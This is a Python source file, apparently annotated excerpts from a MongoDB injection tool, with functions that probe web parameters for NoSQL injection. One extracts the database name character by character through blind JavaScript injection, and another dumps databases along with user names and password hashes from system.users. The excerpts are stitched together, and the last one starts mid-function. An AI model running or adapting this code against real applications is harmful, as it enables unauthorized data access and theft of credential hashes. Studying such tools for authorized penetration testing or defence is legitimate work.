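def _describeTarget(testNum, postData, useGtDict):
    """Return the record that checkResult appends to validAddrs/possAddrs.

    For GET the record is the probe URL ``urlArray[testNum]``; for any other
    method it is the string form of the dict that was posted.  ``useGtDict``
    preserves an asymmetry of the original classifier: only the "injection
    works" branch maps test 2 to ``gtDict``, the other branches record
    ``postData`` for it.
    """
    if httpMethod == 'GET':
        return urlArray[testNum]
    if testNum == 1:
        return str(neDict)
    if useGtDict and testNum == 2:
        return str(gtDict)
    return str(postData)


def checkResult(baseSize, injectSize, testNum, postData):
    """Classify one probe by the size difference between two responses.

    Args:
        baseSize: length of the response to the request carrying a random
            parameter value.
        injectSize: length of the response to the request carrying the probe.
        testNum: index of the probe; selects the URL in ``urlArray`` (GET) or
            which dict is recorded (POST).
        postData: the POST body dict, recorded for POST probes other than 1/2.

    Side effects:
        Appends a target description to the module-level ``validAddrs`` or
        ``possAddrs`` and prints a verdict.  Returns None.

    The verdict is a pure size heuristic with a fixed 100-byte threshold: a
    non-empty response differing by at least 100 bytes is reported as a
    working injection, a smaller non-zero difference as "possible", and an
    identical size as a failure.  ``delta`` is an absolute value, so the last
    branch is only reached when ``injectSize`` is 0 and ``baseSize`` is not.

    NOTE(review): the original also assigned local flags lt24/str24/int24 in
    the first branch that nothing read; they were dropped here.  If they were
    meant to be module globals for later probes they need ``global``
    declarations -- confirm against the rest of the file.
    """
    global validAddrs  # module-level result lists, mutated in place
    global possAddrs

    delta = abs(baseSize - injectSize)

    if delta >= 100 and injectSize != 0:
        printInfoMsg(
            '[*] Response varied %s bytes from random parameter value! Injection works!'
            % delta)
        validAddrs.append(_describeTarget(testNum, postData, True))
    elif 0 < delta < 100 and injectSize != 0:
        print('[*] Response variance was only %s bytes. Injection returned a MongoDB Error. Injection may be possible.' % delta)
        possAddrs.append(_describeTarget(testNum, postData, False))
    elif delta == 0:
        print('[*] Injection did not work.')
    else:
        # Only reachable with injectSize == 0 and baseSize != 0 (see docstring).
        print('[*] Injected response was smaller than random response. Injection may be possible.')
        possAddrs.append(_describeTarget(testNum, postData, False))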
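def displayDBS(conn):
    """Print every database, its non-system collections and any system.users entries.

    Args:
        conn: a pymongo-style client supporting ``database_names()`` and
            ``conn[name].collection_names()``.

    All output goes to stdout through print/printInfoMsg; failures are
    reported through printErrMsg and never raised.  The ``pwd`` field of
    ``system.users`` is a credential hash, so whatever captures this output
    (terminal logs, reports) holds sensitive material.
    """
    try:
        printInfoMsg('[+] List of databases:')
        for dbname in conn.database_names():
            print('    %s' % dbname)
        print('\n')
    except Exception:
        # Narrowed from a bare except so Ctrl-C / SystemExit still propagate.
        printErrMsg('[Error] Couldn\'t list databases.')

    try:
        for dbname in conn.database_names():
            db = conn[dbname]
            printInfoMsg('[+] DBname: %s' % dbname)
            colls = db.collection_names(include_system_collections=False)
            printInfoMsg('[+] %s Collections:' % dbname)
            for coll in colls:
                print('    %s' % coll)
            print('\n')

            # Second, unfiltered listing: the one above excludes system.*.
            if 'system.users' in db.collection_names():
                users = list(db.system.users.find())
                printInfoMsg('[+] Database User and Password hash:')
                try:
                    for user in users:
                        # NOTE(review): the expression between the two string
                        # literals was redacted in the source; 'user' is the
                        # documented system.users field name -- confirm.
                        print("    Username: " + user['user'] + "    Hash: " + user['pwd'])
                        print("\n")
                except Exception as e:
                    printErrMsg('[Error] %s, couldn\'t list user or hash\n' %
                                e)
                    continue
    except Exception as e:
        printErrMsg('[Error] %s, Couldn\'t list collections.\n' % e)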
def getDBInfo():
    """Recover the database name one character at a time through urlArray[11].

    ``urlArray[11]`` is a GET URL containing a ``---`` placeholder.  The
    function first requests the template unchanged to obtain ``baseLen``,
    then loops until a substituted request returns a body of the same
    length, printing the name as it is built.  Nothing is returned; all
    results go to stdout.

    Review notes (code left unchanged):
    - ``trueUrl`` is computed but never used.
    - Neither loop has an upper bound: ``DBnameLen`` and ``charCount`` are
      incremented until a response length matches ``baseLen``, so a server
      that never matches keeps either loop running indefinitely.
    """
    getDBnameLen = False
    getDBname = False
    DBnameLen = 0
    nameCount = 0
    charCount = 0
    dbName = ''

    chars = string.ascii_letters + string.digits
    trueUrl = urlArray[11].replace("---", "return true; var v ='!" + "&")  # unused
    req = requests.get(urlArray[11], headers=HEADERS)
    baseLen = int(len(req.content))  # reference size every probe is compared against

    print '[*] Calculating the length of the database name.'

    # Phase 1: find the name length.  Exits only when a probe body matches baseLen.
    while getDBnameLen == False:
        calcUrl = urlArray[11].replace(
            "---",
            "if(db.getName().length==%s) {return true;} var v='a&" % DBnameLen)
        req = requests.get(calcUrl)
        UrlLen = int(len(req.content))

        if UrlLen == baseLen:
            print '[*] Got database name length of %s characters.' % DBnameLen
            getDBnameLen = True
        else:
            DBnameLen += 1

    printInfoMsg('[+] Database name is: '),
    # Phase 2: one position at a time, walk `chars` until the body matches baseLen.
    while getDBname == False:
        calcUrl = urlArray[11].replace(
            "---", "if(db.getName()[%s]==chars[%s]){return true;} var v='a&" %
            (nameCount, charCount))
        req = requests.get(calcUrl)
        UrlLen = int(len(req.content))

        if UrlLen == baseLen:
            dbName += chars[charCount]
            print dbName,  # trailing comma: stay on the same line
            nameCount += 1
            charCount = 0

            if nameCount == DBnameLen:
                getDBname = True
        else:
            charCount += 1
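def postWeb(reqFile):
    """Run the POST web-app checks using a saved request file.

    Args:
        reqFile: path to a request log.  It is validated by ``checkFile``,
            read as bytes and handed to ``parseBurpLog``, which is expected
            to fill the module-level ``addedTarget`` dict with 'url' and
            'data' entries.

    Side effects:
        Resets the module-level state shared with the other probes
        (testNum, httpMethod, possAddrs, validAddrs, addedTarget,
        paramNames, paramValues), delegates the requests to
        ``buildPostdata`` and prints the valid and possible targets that
        were collected.  Returns None; every failure is reported through
        printErrMsg instead of being raised.
    """
    print('[*] Start web app attacks (POST)')

    global testNum, httpMethod, possAddrs, validAddrs
    global addedTarget, paramNames, paramValues
    testNum = 1
    httpMethod = 'POST'
    possAddrs = []
    validAddrs = []
    addedTarget = dict()
    paramNames = []
    paramValues = []

    checkFile(reqFile)
    try:
        with openFile(reqFile, 'rb') as f:
            content = f.read()
    except Exception:
        # Narrowed from a bare except so Ctrl-C / SystemExit still propagate.
        printErrMsg(
            '[Error] Something went wrong while trying to read the content of file \'%s\''
            % reqFile)
        return

    parseBurpLog(content)
    # .get() so a log that yields neither key reports the error below
    # instead of raising KeyError.
    if not addedTarget.get('url') or not addedTarget.get('data'):
        printErrMsg(
            '[Error] Unable to find usable request(s), in provided file (\'%s\')'
            % reqFile)
        return

    print('[*] Testing connection to the target URL.')
    buildPostdata(addedTarget['url'], addedTarget['data'])

    printInfoMsg('[+] Valid URLs:')
    for addr in validAddrs:
        printInfoMsg('    %s' % addr)

    print('\n ')
    printInfoMsg('[+] Possible URLs:')
    for addr in possAddrs:
        printInfoMsg('    %s' % addr)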
def buildUrl(url, value):
    """Split a GET URL into parameter names/values and ask which ones to inject.

    Resets the module-level ``urlArray`` to twelve empty slots.  The lines
    shown here only parse ``url`` and collect the chosen names into
    ``injectParams``; ``urlArray`` is not populated and neither
    ``injectParams`` nor ``value`` is used within this excerpt, so the
    function presumably continues beyond it -- TODO confirm against the
    full source.  Returns None on every path visible here.
    """
    global urlArray
    urlArray = ['', '', '', '', '', '', '', '', '', '', '', '']
    paramNames = []
    paramValues = []
    injectParams = []

    try:
        split_url = url.split('?')
        params = split_url[1].split('&')
    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt and
        # SystemExit; the failures this guards are IndexError (no '?') and
        # AttributeError (url is not a string).
        printErrMsg(
            '[Error] Not able to parse the URL and parameters. Check the url')
        return

    for item in params:
        # find() returns -1 when there is no '=', which makes the name
        # item[:-1] and the value the whole item.
        index = item.find('=')
        paramNames.append(item[0:index])
        paramValues.append(item[index + 1:len(item)])

    printInfoMsg('[+] List of parameters:')
    index = 1  # 1-based numbering shown to the user and expected back below
    for name in paramNames:
        print '    [%s] %s' % (index, name)
        index += 1

    try:
        injectIndex = getQuesMsg(
            '[*] Choose parmeters to inject (such as 1,2,3):')
        #print injectIndex.split(',')
        # Non-numeric input raises ValueError, an out-of-range number
        # IndexError; both are reported by the handler below.
        for i in injectIndex.split(','):
            injectParams.append(paramNames[int(i) - 1])
    except Exception, e:
        printErrMsg('[Error] %s. Somthing wrong... Check inject parmeters.' %
                    e)
        return
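def displayInfo(conn):
    """Print version, debug flag and word size of the connected server.

    Args:
        conn: a pymongo-style client exposing ``server_info()``, which must
            return a dict with 'version', 'debug' and 'bits' keys.

    ``server_info()`` is fetched once so a single round-trip supplies all
    three values.  Output goes to stdout through printInfoMsg/print;
    returns None.
    """
    info = conn.server_info()
    printInfoMsg('[+] Server Info:')
    print('    MongoDB Version: %s' % info['version'])
    print('    Debugs enabled: %s' % str(info['debug']))
    print('    Platform: %s bits' % str(info['bits']))
    print('\n')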
            reqTime = round((end - start), 3)

            print '[*] App is up, got response length of %s' % resLength
        else:
            printErrMsg('[Error] Got %s from the app, check your options.' %
                        req.status_code)
            return

    except Exception, e:
        printErrMsg(
            '[Error] %s. Looks like the server didn\'t respond.  Check your options.'
            % e)
        return
    if appUp == True:
        index = 1
        printInfoMsg('[+] List of post params:')
        for params in postParams:
            print '    [%s] %s' % (index, params)
            index += 1
        try:
            injectIndex = getQuesMsg('Choose a parmeter to inject: ')
            injOpt = postParams.keys()[int(injectIndex) - 1]
        except Exception, e:
            printErrMsg(
                '[Error] %s. Somthing wrong... Check inject parmeters.' % e)
            return
        injectSize = getQuesMsg('[*] Input test random string size: ')
        injectstr = getInjectStr(int(injectSize))
        postParams[injOpt] = injectstr

        req = requests.post(url, data=postParams, headers=HEADERS)